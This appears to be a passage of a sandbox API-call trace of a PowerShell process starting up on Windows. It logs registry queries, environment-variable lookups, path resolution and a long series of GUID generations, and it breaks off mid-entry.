GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0244.784] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0244.784] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0244.784] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0244.787] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0244.822] ReportEventW (hEventLog=0x7140004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x4ad4788*="Available", lpRawData=0x4ad46b0) returned 1 [0244.825] CoTaskMemAlloc (cb=0x20c) returned 0x6dd9bf8 [0244.825] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x6dd9bf8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0244.825] CoTaskMemFree (pv=0x6dd9bf8) [0244.826] GetCurrentProcessId () returned 0x13b8 [0244.827] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x59e830 | out: phkResult=0x59e830*=0x69c) returned 0x0 [0244.828] RegQueryValueExW (in: hKey=0x69c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x59e850, lpData=0x0, lpcbData=0x59e84c*=0x0 | out: lpType=0x59e850*=0x1, lpData=0x0, lpcbData=0x59e84c*=0x56) returned 0x0 [0244.828] RegQueryValueExW (in: hKey=0x69c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x59e850, lpData=0x4adb408, lpcbData=0x59e84c*=0x56 | out: lpType=0x59e850*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x59e84c*=0x56) returned 0x0 [0244.828] RegCloseKey (hKey=0x69c) returned 0x0 [0244.855] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0244.856] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0244.856] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0244.857] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0244.857] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0244.857] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0244.857] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9 [0244.857] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x9, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0244.857] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0244.857] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0244.857] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x10 [0244.857] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x10, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy", lpFilePart=0x0) returned 0xf [0244.858] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0244.858] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0244.858] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0244.858] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0244.859] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0244.860] CoCreateGuid (in: pguid=0x59e7b4 | out: pguid=0x59e7b4*(Data1=0x3d0ac0f, Data2=0x5ac, Data3=0x4c4c, Data4=([0]=0x83, [1]=0xd9, [2]=0x76, [3]=0xca, [4]=0xae, [5]=0x4d, [6]=0x29, [7]=0x4a))) returned 0x0 [0244.863] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x69c [0244.863] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6a0 [0244.863] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6a4 [0244.863] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6a8 [0244.863] SetEvent (hEvent=0x6a8) returned 1 [0244.863] SetEvent (hEvent=0x69c) returned 1 [0244.864] SetEvent (hEvent=0x6a0) returned 1 [0244.864] SetEvent (hEvent=0x6a4) returned 1 [0244.867] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6ac [0244.868] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x59e52c | out: phkResult=0x59e52c*=0x6b0) returned 0x0 [0244.869] RegQueryValueExW (in: hKey=0x6b0, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x59e54c, lpData=0x0, lpcbData=0x59e548*=0x0 | out: lpType=0x59e54c*=0x0, lpData=0x0, lpcbData=0x59e548*=0x0) returned 0x2 [0244.870] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6b4 [0244.871] SetEvent (hEvent=0x6b4) returned 1 [0248.724] CoCreateGuid (in: pguid=0x59e97c | out: pguid=0x59e97c*(Data1=0x9dead611, Data2=0x7c6e, Data3=0x4d8e, Data4=([0]=0x93, [1]=0x3a, [2]=0xce, [3]=0x96, [4]=0xbe, [5]=0x55, [6]=0xc2, [7]=0xa1))) returned 0x0 [0248.725] CoTaskMemAlloc (cb=0x20c) returned 0x7e17300 [0248.725] GetEnvironmentVariableW (in: lpName="PathEXT", lpBuffer=0x7e17300, nSize=0x104 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0248.725] CoTaskMemFree (pv=0x7e17300) [0248.726] CoTaskMemAlloc (cb=0x20c) returned 0x7e17300 [0248.726] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x7e17300, nSize=0x104 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0xc2 [0248.727] CoTaskMemFree (pv=0x7e17300) [0248.727] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0x59e70c, nSize=0x64 | out: lpDst="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules;C:\\PY眔") returned 0xc3 [0248.727] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0x59e64c, nSize=0xc3 | out: lpDst="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0xc3 [0248.727] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x59e7e8 | out: phkResult=0x59e7e8*=0x7dc) returned 0x0 [0248.728] RegQueryValueExW (in: hKey=0x7dc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x59e804, lpData=0x0, lpcbData=0x59e800*=0x0 | out: lpType=0x59e804*=0x2, lpData=0x0, lpcbData=0x59e800*=0xbc) returned 0x0 [0248.728] RegQueryValueExW (in: hKey=0x7dc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x59e804, lpData=0x4bc36f4, lpcbData=0x59e800*=0xbc | out: lpType=0x59e804*=0x2, lpData="%ProgramFiles%\\WindowsPowerShell\\Modules;%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules", lpcbData=0x59e800*=0xbc) returned 0x0 [0248.728] ExpandEnvironmentStringsW (in: lpSrc="%ProgramFiles%", lpDst=0x59e668, nSize=0x64 | out: lpDst="C:\\Program Files (x86)") returned 0x17 [0248.729] ExpandEnvironmentStringsW (in: lpSrc="%\\WindowsPowerShell\\Modules;%", lpDst=0x59e668, nSize=0x64 | out: lpDst="%\\WindowsPowerShell\\Modules;%") returned 0x1e [0248.729] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x59e668, nSize=0x64 | out: lpDst="C:\\WINDOWS") returned 0xb [0248.729] ExpandEnvironmentStringsW (in: lpSrc="%ProgramFiles%\\WindowsPowerShell\\Modules;%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0x59e668, nSize=0x64 | out: lpDst="C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x64 [0248.729] RegCloseKey (hKey=0x7dc) returned 0x0 [0248.729] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0x59e70c, nSize=0x64 | out: lpDst="C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x64 [0248.729] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x59e7e8 | out: phkResult=0x59e7e8*=0x7dc) returned 0x0 [0248.730] RegQueryValueExW (in: hKey=0x7dc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x59e804, lpData=0x0, lpcbData=0x59e800*=0x0 | out: lpType=0x59e804*=0x0, lpData=0x0, lpcbData=0x59e800*=0x0) returned 0x2 [0248.730] RegCloseKey (hKey=0x7dc) returned 0x0 [0248.751] CoTaskMemAlloc (cb=0x20c) returned 0x7e17300 [0248.751] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x7e17300 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0248.752] CoTaskMemFree (pv=0x7e17300) [0248.752] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x17 [0248.752] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x17, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16 [0248.752] ExpandEnvironmentStringsW (in: lpSrc="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpDst=0x59e6f0, nSize=0x64 | out: lpDst="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules") returned 0x33 [0248.753] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0248.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="IsWow64Process", cchWideChar=14, lpMultiByteStr=0x59e7e4, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsWow64Process\x9er¥\x0b\x927ðù¡sìîY", lpUsedDefaultChar=0x0) returned 14 [0248.754] GetProcAddress (hModule=0x772d0000, lpProcName="IsWow64Process") returned 0x772e5a20 [0248.804] GetCurrentProcess () returned 0xffffffff [0248.804] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x59e844 | out: Wow64Process=0x59e844) returned 1 [0248.804] CoTaskMemAlloc (cb=0x20c) returned 0x7e17300 [0248.804] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x7e17300 | out: pszPath="C:\\Users\\FD1HVy\\Documents") returned 0x0 [0248.805] CoTaskMemFree (pv=0x7e17300) [0248.805] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1a [0248.805] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x1a, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents", lpFilePart=0x0) returned 0x19 [0248.805] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 1 [0248.829] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x59e0d8 | out: phkResult=0x59e0d8*=0x7dc) returned 0x0 [0248.830] RegQueryValueExW (in: hKey=0x7dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x59e0f8, lpData=0x0, lpcbData=0x59e0f4*=0x0 | out: lpType=0x59e0f8*=0x1, lpData=0x0, lpcbData=0x59e0f4*=0x56) returned 0x0 [0248.831] RegQueryValueExW (in: hKey=0x7dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x59e0f8, lpData=0x4bcbf9c, lpcbData=0x59e0f4*=0x56 | out: lpType=0x59e0f8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x59e0f4*=0x56) returned 0x0 [0248.831] RegCloseKey (hKey=0x7dc) returned 0x0 [0248.832] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xa0b635f4, Data2=0x2723, Data3=0x4561, Data4=([0]=0xb6, [1]=0xeb, [2]=0x9b, [3]=0xdb, [4]=0x13, [5]=0x64, [6]=0x99, [7]=0xb0))) returned 0x0 [0248.832] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xf716d318, Data2=0xc53a, Data3=0x466c, Data4=([0]=0xba, [1]=0x77, [2]=0x5, [3]=0xd, [4]=0x1d, [5]=0xe2, [6]=0xed, [7]=0xe0))) returned 0x0 [0248.832] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xb6edde98, Data2=0xee78, Data3=0x496e, Data4=([0]=0x88, [1]=0x14, [2]=0x15, [3]=0x38, [4]=0xf0, [5]=0x59, [6]=0x16, [7]=0xc8))) returned 0x0 [0248.832] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xf4f54399, Data2=0x610e, Data3=0x48c4, Data4=([0]=0xb8, [1]=0x70, [2]=0xac, [3]=0x9, [4]=0x19, [5]=0x92, [6]=0x6d, [7]=0x3e))) returned 0x0 [0248.832] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xbb5c7d85, Data2=0xffbe, Data3=0x4909, Data4=([0]=0x82, [1]=0x33, [2]=0xc1, [3]=0x55, [4]=0x5f, [5]=0x2a, [6]=0xed, [7]=0xee))) returned 0x0 [0248.832] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xa703ccdb, Data2=0x1bc6, Data3=0x4fbb, Data4=([0]=0xa9, [1]=0x95, [2]=0x53, [3]=0x5f, [4]=0x22, [5]=0x9d, [6]=0x11, [7]=0x78))) returned 0x0 [0248.832] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x9acd03bb, Data2=0x918f, Data3=0x4a82, Data4=([0]=0x96, [1]=0x28, [2]=0x82, [3]=0xfb, [4]=0x8e, [5]=0x1e, [6]=0xef, [7]=0xc9))) returned 0x0 [0248.832] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xbe39550d, Data2=0xe9a7, Data3=0x47f4, Data4=([0]=0x88, [1]=0x28, [2]=0x7, [3]=0x4, [4]=0xa8, [5]=0xcc, [6]=0xd0, [7]=0x50))) returned 0x0 [0248.833] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xed1fcc09, Data2=0xd0af, Data3=0x4907, Data4=([0]=0xa5, [1]=0x8d, [2]=0x6a, [3]=0x45, [4]=0x0, [5]=0x23, [6]=0x5a, [7]=0x6))) returned 0x0 [0248.833] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x491807a4, Data2=0x9250, Data3=0x499b, Data4=([0]=0xae, [1]=0xfb, [2]=0x66, [3]=0x4b, [4]=0x85, [5]=0x7c, [6]=0xd9, [7]=0xd))) returned 0x0 [0248.833] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xc9f4211, Data2=0x7473, Data3=0x4ae3, Data4=([0]=0xaa, [1]=0xaf, [2]=0x41, [3]=0x6b, [4]=0x53, [5]=0x7, [6]=0xf4, [7]=0xad))) returned 0x0 [0248.833] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xd1d03df7, Data2=0x8a3d, Data3=0x42ae, Data4=([0]=0xa1, [1]=0x34, [2]=0x5e, [3]=0xe8, [4]=0x8d, [5]=0x5f, [6]=0x7f, [7]=0xe5))) returned 0x0 [0248.833] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xa927aaf7, Data2=0xaca9, Data3=0x4e03, Data4=([0]=0x87, [1]=0x14, [2]=0xa6, [3]=0xdb, [4]=0xba, [5]=0xb, [6]=0x8f, [7]=0x1b))) returned 0x0 [0248.833] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x3f610306, Data2=0xa285, Data3=0x4791, Data4=([0]=0x9d, [1]=0xb5, [2]=0x23, [3]=0xd4, [4]=0x3e, [5]=0xda, [6]=0xa1, [7]=0xdd))) returned 0x0 [0248.834] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xfec90de4, Data2=0x53df, Data3=0x40e1, Data4=([0]=0xab, [1]=0x1a, [2]=0xbe, [3]=0x71, [4]=0x61, [5]=0x5c, [6]=0x82, [7]=0x20))) returned 0x0 [0248.834] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x62f0798d, Data2=0x4326, Data3=0x4d9f, Data4=([0]=0xbb, [1]=0x85, [2]=0x2b, [3]=0x45, [4]=0x97, [5]=0xfc, [6]=0x96, [7]=0x6c))) returned 0x0 [0248.840] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x136ca456, Data2=0x7a75, Data3=0x43fb, Data4=([0]=0x99, [1]=0x60, [2]=0xe0, [3]=0x83, [4]=0xe5, [5]=0x15, [6]=0x12, [7]=0xb1))) returned 0x0 [0248.840] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x52700646, Data2=0xab61, Data3=0x4a93, Data4=([0]=0xb7, [1]=0xa2, [2]=0x45, [3]=0x80, [4]=0xae, [5]=0x5e, [6]=0x89, [7]=0xb))) returned 0x0 [0248.841] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x45a3a1b0, Data2=0x983, Data3=0x4242, Data4=([0]=0xbe, [1]=0xbb, [2]=0x1a, [3]=0xb5, [4]=0xf2, [5]=0x40, [6]=0xaa, [7]=0xdc))) returned 0x0 [0248.841] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xf8d33985, Data2=0xfbae, Data3=0x4be1, Data4=([0]=0xbb, [1]=0x88, [2]=0x30, [3]=0xb3, [4]=0xd6, [5]=0x10, [6]=0x50, [7]=0x53))) returned 0x0 [0248.841] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x8d3f5a40, Data2=0x60e5, Data3=0x4b15, Data4=([0]=0xbb, [1]=0xf6, [2]=0xe2, [3]=0xf3, [4]=0x79, [5]=0x2, [6]=0x6e, [7]=0xe4))) returned 0x0 [0248.842] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x72a8df8d, Data2=0x537c, Data3=0x44b8, Data4=([0]=0xa9, [1]=0xa9, [2]=0xa1, [3]=0x68, [4]=0x8b, [5]=0x9d, [6]=0x1c, [7]=0x23))) returned 0x0 [0248.842] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xa6845c47, Data2=0x774d, Data3=0x4bb2, Data4=([0]=0xb2, [1]=0x29, [2]=0xd6, [3]=0xed, [4]=0xad, [5]=0xc0, [6]=0xd2, [7]=0x88))) returned 0x0 [0248.842] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x1f5277ea, Data2=0xbce1, Data3=0x4b76, Data4=([0]=0xae, [1]=0xfc, [2]=0x52, [3]=0x2, [4]=0xdc, [5]=0x6d, [6]=0xb6, [7]=0x62))) returned 0x0 [0248.842] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xcd2198db, Data2=0x8907, Data3=0x4dda, Data4=([0]=0x8e, [1]=0xea, [2]=0xf9, [3]=0xd8, [4]=0x7e, [5]=0x9d, [6]=0xf3, [7]=0xbf))) returned 0x0 [0248.842] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xeeca0b70, Data2=0xfdac, Data3=0x4497, Data4=([0]=0x94, [1]=0xfb, [2]=0x50, [3]=0x82, [4]=0x1c, [5]=0x7b, [6]=0x8d, [7]=0x49))) returned 0x0 [0248.935] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x30a66edf, Data2=0x8305, Data3=0x4d38, Data4=([0]=0xa8, [1]=0x5d, [2]=0x68, [3]=0x3c, [4]=0xb7, [5]=0x7a, [6]=0x3c, [7]=0x8d))) returned 0x0 [0248.935] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x48417cef, Data2=0x5021, Data3=0x4a0b, Data4=([0]=0x98, [1]=0xe4, [2]=0x34, [3]=0x92, [4]=0xd2, [5]=0xaf, [6]=0x88, [7]=0xf7))) returned 0x0 [0248.936] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x2ae3d098, Data2=0x806d, Data3=0x4689, Data4=([0]=0xaa, [1]=0x84, [2]=0x62, [3]=0xed, [4]=0x3b, [5]=0xf5, [6]=0xd4, [7]=0x8b))) returned 0x0 [0248.936] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x7f0e8187, Data2=0x83e, Data3=0x401d, Data4=([0]=0x98, [1]=0xf8, [2]=0x62, [3]=0xf6, [4]=0x9f, [5]=0xeb, [6]=0x21, [7]=0x1a))) returned 0x0 [0248.936] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x7fd102d8, Data2=0x4e2f, Data3=0x4dcc, Data4=([0]=0x94, [1]=0x7b, [2]=0xdb, [3]=0xf9, [4]=0xcb, [5]=0x12, [6]=0xef, [7]=0xa0))) returned 0x0 [0248.936] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xb61aa26a, Data2=0x4845, Data3=0x430d, Data4=([0]=0xba, [1]=0x33, [2]=0x1d, [3]=0x1f, [4]=0xe9, [5]=0xf8, [6]=0xda, [7]=0xe6))) returned 0x0 [0248.936] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x94aa5fe4, Data2=0x7103, Data3=0x4089, Data4=([0]=0xa9, [1]=0x4a, [2]=0x9e, [3]=0xbb, [4]=0xba, [5]=0x78, [6]=0x99, [7]=0xc8))) returned 0x0 [0248.936] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xbc0bd8a1, Data2=0x9f94, Data3=0x4746, Data4=([0]=0x9a, [1]=0xc, [2]=0x37, [3]=0xb, [4]=0x1b, [5]=0x3c, [6]=0x22, [7]=0xa0))) returned 0x0 [0249.065] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xb28654df, Data2=0x10b7, Data3=0x4876, Data4=([0]=0x8f, [1]=0xd, [2]=0xfe, [3]=0xdb, [4]=0xdf, [5]=0x73, [6]=0x9e, [7]=0xb2))) returned 0x0 [0249.066] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xecd0163a, Data2=0xd3f3, Data3=0x4216, Data4=([0]=0x86, [1]=0xb8, [2]=0x41, [3]=0xec, [4]=0x3d, [5]=0x9e, [6]=0x51, [7]=0xeb))) returned 0x0 [0249.066] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xa6a878c7, Data2=0x460d, Data3=0x4977, Data4=([0]=0x85, [1]=0xbe, [2]=0x4d, [3]=0xe5, [4]=0xae, [5]=0xe6, [6]=0x9b, [7]=0x3f))) returned 0x0 [0249.069] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xbbe29e7c, Data2=0xf48a, Data3=0x442b, Data4=([0]=0xb2, [1]=0xfb, [2]=0x38, [3]=0x59, [4]=0xd6, [5]=0x1f, [6]=0x69, [7]=0x93))) returned 0x0 [0249.069] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x93c3da6f, Data2=0x6cd3, Data3=0x45da, Data4=([0]=0x80, [1]=0x87, [2]=0x31, [3]=0x2, [4]=0xff, [5]=0xf2, [6]=0xed, [7]=0x65))) returned 0x0 [0249.070] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xe36a692, Data2=0x2db2, Data3=0x4338, Data4=([0]=0xae, [1]=0x33, [2]=0xed, [3]=0x3d, [4]=0x8d, [5]=0xa5, [6]=0x39, [7]=0x37))) returned 0x0 [0249.070] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xd6f39acd, Data2=0x6544, Data3=0x43c7, Data4=([0]=0xb6, [1]=0x87, [2]=0xff, [3]=0x31, [4]=0x10, [5]=0x66, [6]=0x6e, [7]=0xf6))) returned 0x0 [0249.070] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xc383b0c8, Data2=0xb5c2, Data3=0x40cb, Data4=([0]=0xba, [1]=0x30, [2]=0xe5, [3]=0x87, [4]=0x3b, [5]=0xb8, [6]=0xb8, [7]=0xb8))) returned 0x0 [0249.070] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x52cadd10, Data2=0x7419, Data3=0x422b, Data4=([0]=0xbf, [1]=0x59, [2]=0xde, [3]=0x94, [4]=0x3e, [5]=0x11, [6]=0x67, [7]=0xfb))) returned 0x0 [0249.070] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x20a58f10, Data2=0x477a, Data3=0x4835, Data4=([0]=0xb8, [1]=0x74, [2]=0xdb, [3]=0xab, [4]=0x3c, [5]=0x61, 